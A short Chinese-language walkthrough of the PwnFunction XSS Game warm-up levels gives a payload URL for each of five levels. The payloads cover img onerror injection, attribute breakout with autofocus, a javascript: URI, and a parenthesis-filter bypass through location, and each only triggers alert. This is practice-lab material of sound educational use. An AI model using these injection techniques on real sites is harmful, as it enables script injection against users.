分享一个XSS游戏的链接
XSS Game
第一关:
这边有一个innerHTML属性,我们查看官方文档
我们找到了它存在的漏洞,直接利用
https://sandbox.pwnfunction.com/warmups/ma-spaghet.html?somebody=<img src=1 onerror="alert(1337)">
第二关:
https://sandbox.pwnfunction.com/warmups/jefff.html?jeff=aaa";alert(1337);"
第三关:
我第一个想到的就是
https://sandbox.pwnfunction.com/warmups/da-wey.html?wey=aaaaaa" onclick="alert(1)
用到onclick,这个没有满足不能与用户交互的要求,但是其他都符合
https://sandbox.pwnfunction.com/warmups/da-wey.html?wey=aaaaaa" onfocus="alert(1337)
用onfocus会有一点改进,但是在触发的一瞬间还是需要用户聚焦
https://sandbox.pwnfunction.com/warmups/da-wey.html?wey=aaaaaa" onfocus=alert(1337) autofocus="
这个完美符合要求,它会自动聚焦
第四关:
https://sandbox.pwnfunction.com/warmups/ricardo.html?ricardo=javascript:alert(1337)
第五关:
它对很多字符进行了过滤,跟前面第一关一样用到了inner HTML属性,所以我们往img标签想
但是它对()进行了过滤,所以我们想给它的()符号进行编码,但是解析的话还是会被识别,所以我们会用到location属性先将它看作是字符串等绕过了程序再进行解码
https://sandbox.pwnfunction.com/warmups/thats-hawt.html?markassbrownlee=<img src=1 onerror=location="javascript:alert%281337%29">